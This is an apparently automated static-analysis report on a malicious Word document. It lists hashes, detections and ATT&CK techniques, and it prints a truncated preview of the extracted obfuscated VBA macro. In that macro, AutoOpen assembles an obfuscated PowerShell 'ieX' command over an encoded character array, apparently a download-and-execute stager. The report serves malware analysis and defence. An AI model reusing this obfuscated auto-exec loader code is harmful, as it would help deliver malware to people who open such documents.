Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f7e386532623a454…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 107.5 KB
Created: 2018-07-06 15:57:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: 4078916035aa19c8fed39fb9bf651a98
SHA-1: 82a6a932f2624eefca68c3375409bee54ee89600
SHA-256: f7e386532623a4545b5625b99d0d2dbfebba9a2000dcdb8eddcabc276e97d2b9
Risk score: 342

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)

The sample is a malicious Word document carrying obfuscated VBA macros. AutoOpen (in the ThisDocument-derived module zvclOVHuA, so it runs as soon as a user enables macros) evaluates a block of meaningless arithmetic on never-assigned variables, silenced by On Error Resume Next, and then calls GqaRizERbdQ with the concatenated return values of three functions: MWoUArUHCHR, nqisdL and kQJVIoWuhL. The body of GqaRizERbdQ is outside the portion of the source shown below; the Shell() and CreateObject findings indicate it is the execution sink. MWoUArUHCHR assembles its return value from dozens of short string literals and Chr() calls, interleaved with more junk arithmetic; joined, the fragments read `wershell ... &( $SheLLid[1]+$SheLLid[13]+'X') (-jOiN ('8{88A127i118T17<66@73{91<1...`. In PowerShell `$ShellId` is `Microsoft.PowerShell`, so `$ShellId[1]+$ShellId[13]+'X'` evaluates to `ieX`, the usual obfuscated spelling of Invoke-Expression, and what follows is a sequence of numbers separated by junk characters, i.e. a character array that a later part of the command turns back into text. The keyword 'powershell' never appears whole: this function starts at 'wershel' + 'l', and the leading 'po' is presumably supplied by the sink. Taken together this is the shape of a PowerShell download-and-execute stager, and the command appears to be designed to fetch and run a second-stage payload.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6602967-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6602967-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample it is the numeric char-array variant: the number sequence with junk separators built in MWoUArUHCHR() below.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
  • CreateObject call [high] OLE_VBA_CREATEOBJ
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Here the Shell()/CreateObject tokens are reported although neither call appears in the portion of the decoded source shown below; they belong to code outside that portion, most likely the sink GqaRizERbdQ that AutoOpen calls.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: the rule text is generic. For this sample a VBA project was recovered (see Extracted artifacts), so the marker is the same AutoOpen already reported by OLE_VBA_AUTOOPEN and adds no separate evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into any document with drawing parts; it is not contacted at runtime and is not an indicator of compromise.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12239 bytes
SHA-256: 0a4af82210c04a46ce709dd7bca3b5e5e59b9b956e089f154b7f0dc0bbc02063

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zvclOVHuA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   sdnzJ = (EjKzQi - XRQvE * 80629 * UXWcGX / (73136 - bddXv))
   IrYjLh = (ATjZBP - TYzoW * 41058 * LWAJib / (50243 - zFwXs))
   shoih = (KJBvk - cKVcDM * 23868 * iaNVkI / (76906 - OTAlY))
   AZMIH = (qKRwWq - oATCTz * 38699 * Lqlvl / (10742 - WtiCqz))
   UiTmuA = (jzASEM - Gwdka * 77840 * USuYY / (73090 - hvzOwi))
GqaRizERbdQ (MWoUArUHCHR + nqisdL + kQJVIoWuhL)
   aRoBqN = (RDbAH - WAzpJ * 1072 * YNWOl / (3894 - BEGdX))
End Sub


Attribute VB_Name = "DTlnaGwcV"
Function MWoUArUHCHR()
On Error Resume Next
ZvkFsc = bLuXwa * 89473 * uKpZaH - wLkPj * (XsAMak - vqLqVF) * 81546 / itFOd + aDJkYm + wYVcv
QjaqYvbrRO = "wershel" + "l       " + "      " + "     &" + Chr(40) + " $SheLLi" + "d[1]" + Chr(43) + "$She"
liWip = kudlKZ * 72012 * wzciRM - mfufUl * (RhPulv - AjrrG) * 39926 / zHthsV + TOXfYJ + zcwVol
   WPoqJv = kmLsD * 78148 * BzcQM - SsPMmY * (DsWSj - BldsB) * 23524 / AikUjF + bbAtY + fddAc
   tKVpN = DzzEVQ * 76029 * SiBCD - prcCwL * (SqNZwm - oikYQs) * 43834 / JfCVh + FqatDH + CiTrBz
QWwuKMRUjtX = "Llid[13]" + Chr(43) + "'X'" + Chr(41) + " " + Chr(40) + "-jO" + "iN " + Chr(40) + "'8{" + "88A12" + "7i118T1" + "7<66" + "@73{" + "91<1"
ocdXMC = UHKpmZ * 92476 * ZFEil - TaCiz * (hcYYJJ - HqrjW) * 75032 / kpNjjN + iZtsf + XVCatP
   PrQsIk = mYFaDV * 94391 * HvfjNa - rctJnY * (cQzaz - mUbXVY) * 77570 / vTUEi + WEzXYT + AnwzwO
rjbOSWI = "B67p7" + "8p70@73" + "A79<8" + "8@12M98V7" + "3i88" + "V2{123<" + "73B78p11" + "1A64i"
mbZXu = lQtpT * 84464 * MVtXz - wKrbob * (FWBqK - jZjjK) * 39062 / XEqCpO + bqjIq + KjHvzk
   QPPDiH = mfmiD * 18065 * uToma - dPmsA * (AzSlka - BHobw) * 21113 / woKwa + apmnGN + iLBcW
   ilfdSo = iZivB * 75780 * MTzkiD - fjdPj * (nQmHWi - HbDDuO) * 21697 / TKjsks + GvfiCn + FCNjD
WHDkiXGhmb = "69V73i" + "66B88" + "A23T8{10" + "3M86V11" + "7p17T11" + "V68i88p" + "88V92T22" + "@3p3<" + "91{91B91" + "<2i74"
SIsovT = fUmvz * 9523 * kfkOlZ - TJZzED * (piCPb - ASoGV) * 34612 / jBKrF + VKSFAu + DwzSo
   Opqkj = hhSrd * 87604 * BBSzi - TitXZB * (JUBSW - iCJrL) * 48623 / jDnrb + GaQCfA + uWhUSQ
   LUtCH = IOFsqb * 36456 * pEpSN - LNiiX * (tpGME - HznURu) * 35502 / SahuQ + rLWwmE + DvwpOf
   ONjzU = ORrJH * 49687 * NPvCw - vusSVS * (XHUpYu - ASqGrG) * 32672 / JZsYaN + HlSWTn + VvKhj
   wClMj = vZoKq * 62113 * kTazs - qAjWC * (CjwvvK - dkNWG) * 22995 / qlhzIj + kjCVNo + wGNfi
WDvoTj = "{89B66" + "B72M77" + "{79p" + "69B67@" + "66@94p7" + "7M90p7" + "3M94" + "M77B2<7" + "9p67{65" + "V3<12" + "4T93p"
ziszTC = WwTlB * 64899 * SlOWo - DtaiV * (hiArX - KEmDEI) * 24841 / SJFBcn + rnbRMw + iFEKd
FakLqABi = "68V106" + "p122@92B1" + "23T90B" + "30{3p108" + "A68i88T88" + "p92<" + "22i3V3B91" + "<91B91" + "@2T65{7" + "7M92<" + "77T2i7"
DpVHoS = lkSSiN * 14766 * hjPTpk - jjpTVl * (qlHHl - EsjcN) * 34644 / nNiSS + wNbWwz + UFpRVw
   WFvKrd = PhFJD * 94 * oYFijq - ZZLdvV * (zufGOi - zGSwzX) * 45973 / MDtOoQ + FvXfzz + kjvImQ
IYDJhp = "2@73V65T6" + "7i77<69" + "M69i" + "66M72" + "p89M" + "95M88i9" + "4<69@73" + "V95{2i" + "79p67" + "M65@3"
MWoUArUHCHR = QjaqYvbrRO + QWwuKMRUjtX + rjbOSWI + WHDkiXGhmb + WDvoTj + FakLqABi + IYDJhp
   hpGCCp = cJXaOo * 63748 * kjGPQ - lMEbP * (SiLth - pAATNW) * 86235 / RMjlj + jjcwUS + QwdBb
   Ruzisb = jTRTkX * 24932 * ZjTra - lFMYPR * (EXRlk - mXOCt) * 15591 / DNLfkv + MXzij + ufokF
   jLXbHj = AnGXav * 43388 * XAspn - PKKvf * (DPGQQY - jSvrVP) * 48029 / iqZPYi + uVDLzd + AMfbh
   Ybvzh = EajKdZ * 68816 * cYuhnU - MhaiC * (XGiiw - zSbRL) * 95494 / qhjMTI + cSHuCR + zMuVR
End Function
Function nqisdL()
On Error Resume Next
TKnRt = OwnUa * 77015 * nzcIQc - aGhDpi * (sYdlwd - wqXBV) * 20932 / hmuQo + oXhvka + jNckb
   UwfjJk = AGijC * 57358 * jUGZCv - zobfH * (GjwuSJ - Nihmw) * 28481 / RBLTO + XfaOrc + bVKEBC
ioCVmzCc = "@110p1" + "03A25T" + "
... (truncated)